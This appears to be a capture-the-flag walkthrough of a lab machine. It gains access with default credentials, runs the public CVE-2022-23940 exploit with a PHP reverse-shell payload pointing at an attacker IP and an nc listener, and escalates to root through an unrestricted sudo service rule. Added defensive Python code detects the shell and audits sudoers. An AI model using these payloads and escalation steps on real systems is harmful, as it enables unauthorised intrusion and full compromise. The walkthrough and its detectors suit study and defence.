1. Nmap

nmap $ip
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
2. We visited the website on port 80.
3. Looking for ways to access the machine.

We tried the usual default credentials, and the pair admin / admin (lowercase) worked. After finding nothing interesting in the application itself, we searched the internet for vulnerabilities affecting this version and found a GitHub repository with an exploit for it:

CVE-2022-23940
4. We cloned the GitHub repository and installed its requirements.

Installation (from the repository README): make sure a recent version of python3 and pip is installed.

Clone the repo:
git clone https://github.com/manuelz120/CVE-2022-23940.git

Install the required libraries:
pip3 install -r "requirements.txt"

Also edit exploit.py and set the target URL; localhost is the default:
default="http://192.168.204.146",

Run the exploit with a reverse-shell payload pointing at our listener:
./exploit.py -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.172\", 443); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

# Open another terminal for nc
nc -nlvp 443

Once we obtain the shell, we can upgrade it to a fully interactive one with:
python -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl-Z to background the shell, then in the local terminal:
stty raw -echo; fg
export TERM=xterm
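From the defender's side, the two behaviours in this step (a PHP process opening a socket and handing it to /bin/sh with its file descriptors redirected, then a pty.spawn() upgrade) are easy to recognise in process-start telemetry. The following is an added detection example, not code from the writeup or from the exploit repository; the event format "user|parent|cmdline" and the sample events are constructed for the example, and the 10.0.0.5 address is a placeholder.

```python
import re
from typing import Dict, List

# Constructed process-start events in the shape "user|parent|cmdline", the kind
# of record an EDR or auditd pipeline produces. The first two mirror step 4.
SAMPLE_EVENTS = [
    "www-data|apache2|php -r '$sock=fsockopen(\"10.0.0.5\", 443); exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "www-data|sh|python -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "www-data|apache2|php /var/www/html/cron.php",
    "root|cron|/usr/sbin/logrotate /etc/logrotate.conf",
]

# Signatures for what the writeup shows: a socket opened and then passed to a
# shell whose stdin/stdout/stderr are redirected onto it, and the pty upgrade.
INDICATORS = {
    "socket-then-exec": re.compile(
        r"fsockopen\s*\(.*?\b(?:exec|system|passthru|shell_exec|popen)\s*\(", re.S),
    "shell-fds-on-socket": re.compile(r"/bin/(?:ba)?sh\s+-i\b.*[<>]&\d"),
    "pty-upgrade": re.compile(r"\bpty\.spawn\s*\("),
}

# Web service accounts that have no business starting an interactive shell.
WEB_USERS = {"www-data", "apache", "nginx", "http"}
SHELLS = {"sh", "bash", "dash", "zsh"}


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed event line into its three fields."""
    user, parent, cmdline = line.split("|", 2)
    return {"user": user, "parent": parent, "cmdline": cmdline}


def classify(event: Dict[str, str]) -> List[str]:
    """Return the indicator names that fire for one process event."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    # Executable name without its directory, e.g. "/bin/sh" -> "sh".
    exe = event["cmdline"].split()[0].rsplit("/", 1)[-1]
    if event["user"] in WEB_USERS and exe in SHELLS:
        hits.append("web-user-interactive-shell")
    return hits


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious event line to its indicators; clean lines are omitted."""
    alerts = {}
    for line in lines:
        hits = classify(parse_event(line))
        if hits:
            alerts[line] = hits
    return alerts


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_EVENTS).items():
        print(", ".join(hits), "<-", line)
```

The regexes are deliberately narrow so they stay readable; in practice the strongest signal is the last rule, a web server account spawning any shell at all, because it does not depend on the payload's exact wording.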
5. With the interactive shell, we can run some basic enumeration commands.

www-data@crane:/var/www/html$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@crane:/var/www/html$ sudo -l
Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/service
6. Since "service" is allowed with NOPASSWD, we can obtain a root shell through that sudo privilege: service runs /etc/init.d/<name> without validating the name, so a relative path escapes that directory.

sudo /usr/sbin/service ../../../bin/sh
# whoami
root
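The root cause in steps 5 and 6 is a sudoers rule that allows /usr/sbin/service with no argument restriction. Below is an added audit example, not code from the writeup, that parses sudoers-style user specifications, flags rules a shell can be built from, and renders the corrected entry that pins the binary to an exact argument list. The sample sudoers text is constructed to mirror the sudo -l output above plus a few other rules, and the ESCAPE_PRONE list is an assumption for the example rather than an exhaustive catalogue.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: the www-data line mirrors step 5; the others show rules
# that are either already restricted or require a password.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
root      ALL=(ALL:ALL) ALL
www-data  ALL=(ALL) NOPASSWD: /usr/sbin/service
backup    ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
deploy    ALL=(root) PASSWD: /usr/bin/systemctl restart app
"""

# Binaries that hand control to an arbitrary program when allowed without an
# argument restriction. /usr/sbin/service is here because it runs
# /etc/init.d/<name>, so a relative <name> escapes that directory (step 6).
# Assumed starting list; extend it from your own hardening baseline.
ESCAPE_PRONE = {"/usr/sbin/service", "/bin/sh", "/bin/bash"}

# user host=(runas) TAG: cmd [args], cmd [args], ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$")


def parse_rule(line: str) -> Optional[Dict]:
    """Parse one user specification; returns None for lines that are not rules."""
    m = RULE_RE.match(line)
    if not m:
        return None
    tags = {t for t in m.group("tags").replace(" ", "").split(":") if t}
    cmds: List[Tuple[str, List[str]]] = []
    for spec in m.group("cmds").split(","):
        parts = spec.split()
        if parts:
            cmds.append((parts[0], parts[1:]))
    return {"user": m.group("user"), "runas": m.group("runas") or "root",
            "tags": tags, "cmds": cmds}


def audit(sudoers_text: str) -> List[Tuple[str, str, str]]:
    """Return (user, command, reason) for every rule a root shell can be built from."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        rule = parse_rule(line)
        if rule is None:
            continue
        nopasswd = "NOPASSWD" in rule["tags"]
        for path, args in rule["cmds"]:
            if path == "ALL" and nopasswd and rule["user"] != "root":
                findings.append((rule["user"], path, "any command without a password"))
            elif path in ESCAPE_PRONE and not args:
                severity = "high" if nopasswd else "medium"
                findings.append((rule["user"], path,
                                 f"{severity}: unrestricted arguments allow a shell escape"))
    return findings


def restricted_rule(user: str, path: str, args: List[str], runas: str = "root") -> str:
    """Render the corrected entry: same binary, pinned to an exact argument list."""
    return f"{user} ALL=({runas}) NOPASSWD: {path} {' '.join(args)}"


if __name__ == "__main__":
    for user, cmd, reason in audit(SAMPLE_SUDOERS):
        print(f"{user}: {cmd} -> {reason}")
    print("suggested:", restricted_rule("www-data", "/usr/sbin/service", ["apache2", "restart"]))
```

The function expects sudoers syntax (the files under /etc/sudoers.d), not the reformatted output of sudo -l. The fix it suggests is the one that actually closes the hole: keep the privilege but name the exact service and action, so the name can no longer be a path.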
7. Once we are root, we simply look for the flag to report the machine.

# cd root
# ls
email1.txt  proof.txt
# cat proof.txt
XXX9be81080XXXXXX3844493aa3dcXXX

That's all.